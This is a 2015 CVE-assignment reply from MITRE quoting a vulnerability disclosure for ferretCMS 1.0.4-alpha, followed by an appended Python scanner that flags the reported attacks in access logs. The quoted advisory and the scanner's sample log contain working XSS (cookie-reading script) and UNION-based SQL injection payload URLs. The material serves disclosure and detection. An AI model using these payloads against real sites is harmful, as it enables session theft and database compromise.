Date: Tue, 27 Jan 2015 10:37:48 -0500 (EST)
From: cve-assign@...re.org
To: Steffen Rösemann <steffen.roesemann1986@...il.com>
cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload


> I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
> an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
> in the alpha development stage.
>
> ============
> Reflecting XSS
> ============
>
> http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
>
> ============
> Stored XSS
> ============
>
> 1.
> via login-form of the administrative backend, input field for username:
>
> http://{TARGET}/admin.php
>
> executed here in the logevent functionality in the backend:
>
> http://{TARGET}/admin.php?type=log&action=read
>
> 2.
>
> via the new blog-post form, input field for pagetitle:
>
> http://{TARGET}/admin.php?type=page&action=insert&p=
>
> executed, for example, here:
>
> http://{TARGET}/admin.php?type=page&action=read


Use CVE-2015-1373.


> ============
> SQLi
> ============
>
> http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
>
> http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
>
> http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
>
> http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
>
> http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
>
> http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

Use CVE-2015-1372.

> ==================
> Unrestricted file upload
> ==================
>
> An administrator has the opportunity to upload arbitrary files via a form
> located here on a common ferretCMS installation:
>
> http://{TARGET}/admin.php?type=uploader&action=upload
>
> As these files aren't renamed and stored in the following location, any
> unauthenticated user is able to read/execute those files, too:
>
> http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}

Use CVE-2015-1371.


Use CVE-2015-1374 for the underlying CSRF that makes the XSS, SQLi, and 
file-upload attacks accessible to non-administrators.

> Could you please assign a CVE-ID / CVE-IDs for these issues.
>
> Thank you very much!
>
> Greetings.
>
> Steffen Rösemann
>
> References:
>
> [1] https://github.com/JRogaishio/ferretCMS
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
> [3] https://github.com/JRogaishio/ferretCMS/issues/63
> [4] https://github.com/sroesemann/ferretCMS
> [5] http://seclists.org/fulldisclosure/2015/Jan/98
> [6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
>

---

CVE assignment team, MITRE CVE Numbering Authority M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
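As an added illustration (not part of the CVE assignment message, the advisory, or the ferretCMS project), the Python script below shows how a defender could spot the three request shapes the report describes in ordinary web-server access logs: markup in the `action` parameter of a `type=search` request (reflected XSS), a non-numeric `p` parameter on an `action=update` request (SQL injection), and a request for a server-executable file under `/custom/uploads/` (an unrestricted upload being executed). The stored XSS via the login-form username travels in a POST body and does not appear in access logs, so it is out of scope here. The log lines, IP addresses and file names are constructed for the example, and the set of server-executable extensions is an assumption.

```python
"""Flag requests matching the ferretCMS admin.php issues in access logs.

Added example; not code from the advisory or the ferretCMS project.
The sample log lines below are constructed for this example.
"""
import os
import re
from urllib.parse import parse_qs, urlsplit

# A tag opening inside a parameter value, e.g. "<script"
HTML_MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)
# SQL tokens seen in the reported injection probes
SQL_TOKENS = re.compile(r"\b(union|select|substring|version|database|user)\b", re.I)
# Extensions a typical PHP host serves as code (assumed set, adjust to your server)
EXEC_EXT = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl"}

# Common/combined log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (placeholder IPs and file names)
SAMPLE_LOG = """
203.0.113.10 - - [27/Jan/2015:10:37:48 -0500] "GET /admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 512
203.0.113.10 - - [27/Jan/2015:10:38:01 -0500] "GET /admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ HTTP/1.1" 200 2048
198.51.100.7 - - [27/Jan/2015:10:39:15 -0500] "GET /admin.php?type=site&action=update&p=7 HTTP/1.1" 200 2048
198.51.100.7 - - [27/Jan/2015:10:40:02 -0500] "GET /custom/uploads/report.pdf HTTP/1.1" 200 90311
203.0.113.10 - - [27/Jan/2015:10:41:12 -0500] "GET /admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+ HTTP/1.1" 200 2048
203.0.113.10 - - [27/Jan/2015:10:41:30 -0500] "GET /custom/uploads/EXAMPLE_NAME.php HTTP/1.1" 200 64
"""


def classify(request_target):
    """Return a list of finding labels for one request target (path plus query)."""
    findings = []
    parts = urlsplit(request_target)
    if parts.path.endswith("/admin.php"):
        # parse_qs decodes %xx and '+' once; an '=' inside a value stays in the value
        params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
        # Reflected XSS: the search action echoes `action` back unescaped
        if params.get("type") == "search" and HTML_MARKUP.search(params.get("action", "")):
            findings.append("reflected-xss-probe")
        # SQLi: every reported injection point is `p` on an action=update request,
        # and a legitimate `p` is a numeric row id
        if params.get("action") == "update" and "p" in params:
            p = params["p"]
            if not p.isdigit():
                findings.append("sqli-probe" if SQL_TOKENS.search(p) else "malformed-p")
    elif parts.path.startswith("/custom/uploads/"):
        # Uploads keep their original name and live under the web root, so a
        # request for a server-executable extension here means one is being run
        if os.path.splitext(parts.path)[1].lower() in EXEC_EXT:
            findings.append("executable-upload-access")
    return findings


def scan(log_text):
    """Return one record per log line that triggers at least one finding."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        labels = classify(m.group("path"))
        if labels:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "target": m.group("path"), "findings": labels})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["time"], ", ".join(hit["findings"]), hit["target"])
```

Run it on a real log by replacing `SAMPLE_LOG` with the file contents; the `p.isdigit()` check is deliberately strict because the report shows `p` is only ever a row id, so any non-numeric value is worth a look even when no SQL keyword appears.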
